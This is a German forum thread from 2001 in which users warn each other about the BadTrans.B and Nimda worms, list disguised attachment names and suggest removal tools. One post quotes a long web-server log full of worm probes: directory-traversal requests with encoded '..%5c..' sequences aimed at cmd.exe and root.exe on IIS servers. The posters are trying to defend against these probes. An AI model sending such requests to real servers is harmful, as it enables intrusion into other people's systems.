>

                                         

  1. Forum
  3. Allgemein
  5. Music Talk
  7. achtung dringende warnung!!

achtung dringende warnung!!

Mehr
22 Jahre 4 Monate her - 22 Jahre 4 Monate her #1953 von logge
achtung dringende warnung!! wurde erstellt von logge
Ich denke zwar das die meisten boardies hier recht gut informiert sind was computer angeht trotzdem auch hier nochmal eine dringende warnung!! Ich hatte das teil heute auch schon in der post
>Hallo liebe Leserinnen und Leser,

Vorsicht vor einem neuen Worm/Trojaner, namens BadTrans.B1!
Dieser Worm hat die Eigenart, sich sofort ausführen zu wollen, wird die
verseuchte eMail in Outlook/Outlook Express bereits im Vorschaumodus
angezeigt.
Es ist nicht möglich, den Worm anhand eines Betreffs zu erkennen, da
dieser ständig wechselnd ist und sich auf eine eMail bezieht, die man
irgendwann einmal einer Person, deren Rechner mit diesem Worm infiziert
ist, geschrieben hat.

Viele Virenscanner erkennen diesen Worm noch nicht, jedoch sollten die
neuesten Updates von Virenscannern die Signatur filtern können.
Die Version ANTIVIR v6.10.00.81 vom 26.11.2001 kann den Virus erkennen.
Unter
pc-special.de/nlrdr.php?nummer=544673&linknr=51
könnt Ihr sowohl für Windows 95/98/ME als auch für Windows NT/2000/XP
die neueste Version herunterladen.

Es ist unbedingt Vorsicht geboten!

Unter folgenden Namen ist der Virus bei uns bereits in Erscheinung
getreten:
-YOU_ARE_FAT!.MP3.scr
-HAMSTER.DOC.pif
-README.MP3.scr
-Sorry_about_yesterday.MP3.pif
-S3MSONG.DOC.scr
-ME_NUDE.MP3.scr
-DOCS.DOC.pif
-IMAGES.DOC.pif
-New_Napster_Site.MP3.pif

Beachtet bitte, dass Euch momentan nur die Funktion von Outlook Express schützt (Outlook öffnet die Viren in verknüpften Anwendungen, wie MS Mediaplayer etc.), die fragt, ob Ihr den Anhang öffnen oder speichern
möchtet. Diese wird angezeigt, sobald Ihr die Vorschau verwendet oder
die eMail per Doppelklick öffnet. Klickt hier unbedingt auf Abbrechen,
denn solltet Ihr keinen aktuellen Virenscanner verwenden, wird Euer
System das nächste sein, welches BadTrans.B1 versendet.
Erkennung
Wenn ihr eine Email mit dem Betreff "Re:" erhaltet, schaltet
die Auto-Vorschau ab und löscht diese Email sofort. <
Das teil scheint ziemlich aktiv zu sein im cosmoboard hatten
es einige leute gleich mehrmals am tag bekommen
mehr infos HIER
____________________
schönen tag noch
Logge
______________________
Letzte Änderung: 22 Jahre 4 Monate her von logge.

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2009 von juke_box
juke_box antwortete auf achtung dringende warnung!!
@logge
Danke für den sehr umfangreichen Tip :)
Ich sach ja immer, keine Liebe mehr unter den menschen :(
mfg
juke_box
mfg
JB

"Vergib deinen Feinden, aber vergiß niemals ihre Namen."
(Kennedy, John F.)

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her - 22 Jahre 4 Monate her #2023 von OskarMaria
OskarMaria antwortete auf achtung dringende warnung!!
Liebe Mitglieder des Freundeskreis,

ich hatte in den ersten paar Wochen dieses Boards den Mitgliedern uneingeschränkt meinen ftp-Server zur Verfügung gestellt. Leider musste ich das nach einiger Zeit einstellen, da jemand viele Unterverzeichnisse mit eMail-Würmern verseucht hat.

Der Schaden hielt sich in Grenzen. Mit einem einfachen Suchen & Finden waren die Würmchen schnell gefunden und auch beseitigt. Danach habe ich alle meine von mir benutzten Computer noch einmal auf Viren gescannt. Ergebnis: alles paletti!

Ich hatte gehofft, den Übertäter gleich zu finden. Leider zeigten die log-Dateien des ftp-Servers keinen Hinweis auf einen illegalen Zugriff. Aber jetzt kommt es noch besser - seit einigen Tagen wird mein Http-Server auch mit Scans bombardiert. Eine Recherche hat ergeben, dass es sich um den Nimda-Wurm handelt.

Damit ist klar - derjenige der mich ständig belästigt, ist kein Attentäter, sondern selbst Opfer solch eines Würmchens. Damit belästigt er aber intensiv unsere Gemeinschaft und das muss sofort abgestellt werden.

Das ist das Profil unseres schwer am Nimda-Virus erkrankten Mitglieds:

1.) Er ist bereits länger Mitglied beim Freundeskreis
2.) Er hat meinen ftp-Server besucht (vor mindestens drei Wochen, wahrscheinlich aber Mitte Oktober)
3.) Er hat auch versucht mal auf meinen privaten http-Server zuzugreifen (Rätsel im Rock-Forum)
4.) Er geht über t-online ins Netz (die Einwahl-IPs werden durch den Server mitgeloggt)
5.) Er scheint auch Proxies zu benutzen (wahrscheinlich)
6.) Er benutzt den nicht gesicherten Internet-Explorer 5.5 oder früher.

Natürlich weiß ich nicht, welches Geschlecht unser Schwerstkranker hat. Bitte betrachtet diese Bezeichnung als geschlechtsneutral. Aber ich erwarte, dass alle Mitglieder dieses Boards, auf die einige der oben genannten Merkmale zutreffen, ihr komplettes System mit einem Virenscanner durchforsten. Denn es ist auch möglich, dass via ftp der Virus sich weiter unter den Mitgliedern ausgebreitet hat und auch noch weiter ausbreiten wird.

Jeder ist für sein eigenes System verantwortlich. Halten die Scans auf meine privaten Server weiter an, müsste ich demnächst mal die Telekom informieren, mit der Bitte den Betreffenden formal abzuwatschen. Und das will ich eigentlich gar nicht.

Gruß OskarMaria
Oskarmaria's BoardNachrichten
Letzte Änderung: 22 Jahre 4 Monate her von OskarMaria.

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2026 von logge
logge antwortete auf achtung dringende warnung!!
obwohl ja wohl jeder (hoffentlich)nen gescheiten virusscanner laufen hat gibt es unter folgender adresse noch mal extrascanner
für
Win32.Badtrans.B@mm
I-Worm.Sircam.A
Win32.Nimda.A@mm
Win32.Magistr.B@mm
Win32.FunLove.4099
zum download.
www.bitdefender.com/html/free_tools.php
____________________
schönen tag noch
Logge
______________________

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2044 von juke_box
juke_box antwortete auf achtung dringende warnung!!
Guten Abend Boardies!
@OskarMaria
Es wird immer diese Unwissenden geben, denen sowas passiert.
Seit ich im bekanntem Forum auch meine Http Zugang veröffenlich habe sind hier einige Merkwürdigkeiten passiert.
Es wurde reichlich versucht u.a. mittels Portscan mal so zu schauen, wie mein System gesichert ist. Virenupload alles war vertreten *g*
Auch wenn das vielleicht nicht Absicht war, oder Unwissenheit wie Du meinst, sollte jeder sich einen aktuellen Virenscanner auf die Hd installieren.
Das ist doch wohl nicht zuviel verlangt!
Ich bin weiss Gott kein Profi, aber auch kein Anfänger:)
Darüberhinaus kenne ich genug Leutz die etwas mehr bewandert sind im Bereich Sicherheit. Also wenn ich mal was " Undurchsichtiges" erspähe , womit ich so nix anfangen kann, dann frage ich einfach.
Was ist das Fazit..? Neid und Misgunst, Unwissenheit Blödheit ;) Dummheit wasweissichnicht noch alles, treffen auch mal das schönste Board und die Mitgleider.
Aber lieber OskarMaria ich denke mal wir lassen uns alle hier durch solche "Kleinigkeiten" nicht unterkriegen :D
mfg
juke_box
mfg
JB

"Vergib deinen Feinden, aber vergiß niemals ihre Namen."
(Kennedy, John F.)

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2066 von OskarMaria
OskarMaria antwortete auf achtung dringende warnung!!
Hallo juke_box,

ich hoffe, mein Beitrag kam nicht zu negativ an. Unterkriegen lasse ich mich sowieso nicht. Außerdem war ich eher beruhigt, da die Scans und die untergeschobenen Viren nicht absichtlich vorgenommen wurden.

Trotzdem - die Sache hat noch immer kein Ende. Damit ihr mal seht, wie merkwürdig diese Scans sind, hier mal ein kleiner Auszug aus meinen Log-Files

pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:43 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:45 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:46 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:48 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:50 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:52 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:53 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:55 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:57 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:43:59 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:44:00 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:44:02 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:44:04 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:44:06 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:44:08 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:00:44:10 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:42 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:44 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:48 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:50 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:51 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:53 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:55 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:57 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:04:58 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:05:00 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:05:02 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:05:06 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:05:08 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:05:09 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:05:11 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:05:13 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:12 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:13 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:14 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:15 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:18 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:19 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:20 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:21 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:22 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:23 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:25 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:26 +0100] "GET  HTTP/1.0" 400 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:27 +0100] "GET  HTTP/1.0" 400 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:28 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:06:29 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:06 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:07 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:09 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:11 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:12 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:14 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:16 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:18 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:20 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:21 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:22 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:27 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:29 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:31 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:33 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:15:35 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:13 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:14 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:15 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:17 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:18 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:19 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:20 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:22 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:23 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:25 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:26 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:27 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:28 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:29 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:30 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:38:31 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:45 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:45 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:45 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:46 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:46 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:46 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:47 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:47 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:48 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:49 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:49 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:50 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:51 +0100] "GET  HTTP/1.0" 400 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:51 +0100] "GET  HTTP/1.0" 400 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:51 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
p3Exxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:42:52 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:36 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:38 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:40 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:41 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:43 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:45 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:46 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:48 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:49 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:51 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:53 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:55 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:56 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:43:58 +0100] "GET  HTTP/1.0" 400 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:44:00 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:01:44:01 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:49 +0100] "GET /scripts/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:50 +0100] "GET /MSADC/root.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:51 +0100] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:51 +0100] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:52 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:53 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:54 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:55 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:56 +0100] "GET /scripts/..Á ../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:56 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:58 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe HTTP/1.0" 403 -
pDxxxxxxx.dip.t-dialin.net - - [30/Nov/2001:02:12:58 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe HTTP/1.0" 403 -

Oskarmaria's BoardNachrichten

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2179 von Paco668
Paco668 antwortete auf achtung dringende warnung!!
Für diejenigen für die die Warnung zu spät kommt (ist mir trotz aller Achtsamkeit leider auch passiert!), hier noch eine kleine Hilfe:
Bei einer Infektion wird man leider feststellen, daß viele Virenprogramme noch nicht in der Lage sind, dieses elendige Teil zu entfernen. Das gilt besonders für W2k und XP mit NTFS-Partitionen bei denen ein Scannen unter Dos nicht möglich ist.
Auf der folgenden Seite wird ein Tool für die häufigsten Script-Viren angeboten: www.bitdefender.com

Paco668

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2226 von entropy8
entropy8 antwortete auf achtung dringende warnung!!
Hallo,


ich hatte diesen Threat schon länger gesehen und hatte mir nichts gedacht, bis ich gestern mein System durchgescannt hatte. Nimda hat sich schön breit gemacht und ich kämpfe seitdem an der Beseitigung...

Ich habe vor c.a. 2 Wochen aufgrund eines Netztwerkaufbaus mein System neu konfiguriert und im Zuge dessen den Virenschutz ein wenig außen vorgelassen. Das´hat scih wohl jetzt gerächt.

Ich denke aber OskarMaria, dass ich nicht der gesuchte bin.

Merkmale von Nimda auf meinem System:

- Office 2000 läuft nicht mehr
- McAfee läuft nicht mehr
- IE läuft nicht mehr (auf meinem Server)
- Ich hatte auf sämtlichen Computern so um die 400 kopierten Dateien gleichen Inhalts (hauptsächlich .eml, .data und .exe Dateien.)
- Atguard funktioniert auf meinem Server nicht mehr.
- meinServer (Pentium I/ Win 200) kamm aus dem Laden, Kopieren und was weis ich noch nicht mehr herraus...

falls jemand ähnliche Symptome bemerkt, auf Symantec.de gibts zwei spezielle tools, die die Scheiße entfernen.

Einen schönen Tag noch,

en.
komm' her schau dir das kranke zeug an - kickme.to/mydeath

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2236 von broxon
broxon antwortete auf achtung dringende warnung!!
hallo

was ich hier sehe da kann man ja angst bekommen
habe gleich meinen virenscanner geupdatet
habe glück gehabt es was nichts auf meinem system
weis jemand eine gute seite (am besten in deutsch)
über firewall
alle reden darüber und ich versteh nix

danke

broxon

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2238 von 5thavenue
5thavenue antwortete auf achtung dringende warnung!!
